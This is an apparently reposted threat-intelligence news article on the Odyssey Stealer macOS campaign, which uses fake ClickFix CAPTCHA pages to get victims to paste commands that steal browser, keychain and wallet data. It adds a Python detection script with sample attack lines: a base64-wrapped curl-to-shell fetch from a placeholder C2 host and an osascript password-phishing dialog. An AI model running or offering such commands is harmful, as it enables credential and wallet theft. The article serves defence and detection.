Saturday, February 14, 2026

Clickfix Technique Powers New Odyssey Malware to Harvest Browser Cookies, Passwords, and Wallet Data

The CYFIRMA research team has uncovered a new wave of cyberattacks targeting macOS users, leveraging the recently rebranded Odyssey Stealer malware.

This sophisticated threat employs the “Clickfix” technique, an increasingly popular deception strategy involving typosquatted or visually mimicked domains, to deliver malicious AppleScripts (osascripts) that siphon browser cookies, saved passwords, cryptocurrency wallet data, and sensitive personal files.

The Clickfix Technique

Cybercriminals behind the Odyssey Stealer create typosquatting domains that resemble major financial institutions, the Apple App Store, and cryptocurrency news platforms.

When users mistakenly visit these sites, they’re confronted by a fake Cloudflare-style CAPTCHA. macOS visitors are prompted to copy and paste a Base64-encoded command into their Terminal, supposedly to “verify they’re not a robot”.

This command initiates a direct fetch-and-execute action from attacker-controlled infrastructure, specifically the Odyssey Stealer’s command-and-control (C2) servers.

Upon execution, the malware proceeds to run an AppleScript that displays a deceptive password prompt, designed to capture the user’s system credentials silently.

It then validates these credentials in the background using native macOS tools to remain undetected.

The script creates a temporary directory, notably /tmp/lovemrtrump, where it amasses browser cookies, macOS keychain files, and wallet data before compressing them for exfiltration.
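As an added detection-side example (not code from the CYFIRMA report), the following Python scans logged macOS command lines for the chain described above: a base64-wrapped fetch-and-execute, an osascript password prompt, and the /tmp/lovemrtrump staging directory. The sample events, the regular expressions and the encoded payload are constructed for this example; only the staging path comes from the report.

```python
import base64
import re

# Heuristics for the chain described above. STAGING_DIR is the path named in the
# report; the regular expressions and thresholds are this example's own assumptions.
FETCH_TOOL = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z)?sh\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
STAGING_DIR = "/tmp/lovemrtrump"

def decoded_views(cmd):
    """Best-effort decode of base64-looking tokens so a wrapped command can be inspected."""
    views = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            views.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            pass  # not base64/UTF-8: an ordinary argument, skip it
    return views

def classify(cmd):
    """Return the reasons a logged command line matches the ClickFix/Odyssey chain."""
    reasons = []
    if FETCH_TOOL.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("fetch-and-execute")
    if any(FETCH_TOOL.search(v) and PIPE_TO_SHELL.search(v) for v in decoded_views(cmd)):
        reasons.append("fetch-and-execute (base64-wrapped)")
    if "osascript" in cmd and "hidden answer" in cmd:
        reasons.append("osascript password prompt")
    if STAGING_DIR in cmd:
        reasons.append("known staging directory")
    return reasons

# Constructed sample process-execution records, not telemetry from the report. The
# wrapped payload is encoded at runtime so the sample stays readable.
WRAPPED = base64.b64encode(b"curl -fsSL http://c2.example.invalid/get | sh").decode()
SAMPLE_EVENTS = [
    f"echo {WRAPPED} | base64 -d | bash",  # what the fake CAPTCHA page asks the user to paste
    "osascript -e 'display dialog \"Enter password\" default answer \"\" with hidden answer'",
    "mkdir -p /tmp/lovemrtrump",
    "zip -r /tmp/lovemrtrump/out.zip /tmp/lovemrtrump",
    "echo aGVsbG8gd29ybGQ= | base64 -d",  # benign base64 use, must not alert
    "ls -la ~/Documents",
]

if __name__ == "__main__":
    for cmd in SAMPLE_EVENTS:
        if classify(cmd):
            print(f"ALERT {classify(cmd)}: {cmd}")
```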

Comprehensive Data Theft: Browsers, Wallets, and More

Odyssey Stealer demonstrates a wide-ranging reach across popular browsers and cryptocurrency wallets.

It raids Chrome, Brave, Edge, Opera, and Firefox for login credentials, payment information, session cookies, and cryptocurrency extension data (such as MetaMask wallet seeds and private keys).

For Firefox, it targets “logins.json” and decrypts passwords using “key4.db”. Safari users aren’t spared—cookies, autofill records, and histories are all targeted.

The malware also searches for desktop wallet files from apps like Electrum, Exodus, and Coinomi, alongside files from familiar password managers (.kdbx format) and personal documents (.txt, .pdf, .docx, .jpg, .kdbx).

All stolen information is compressed into a ZIP archive and sent via repeated POST requests to the attacker’s servers, with persistent reconnection attempts if uploads fail.

Command and Control: Professional Malware Management

Odyssey Stealer’s backend panel showcases features for attackers: dashboards to monitor infections, builders for malware customization, bot management, and the ability to restore stolen Google cookies for session hijacking.

Most identified panels appear to be hosted in Russia, with the operation actively avoiding targets in CIS countries, a hallmark of many Russian cybercrime groups.

Odyssey Stealer, evolved from Poseidon and AMOS, represents the cutting edge of Mac-focused info-stealers.

It is distributed via convincing fake websites and wields a potent suite of credential, wallet, and data theft tools, clearly focusing on Western finance and cryptocurrency communities.

Users are strongly advised to install only trusted software, block unnecessary scripting tools, and maintain vigilant endpoint and network security to counter this emerging threat.

Indicators of Compromise

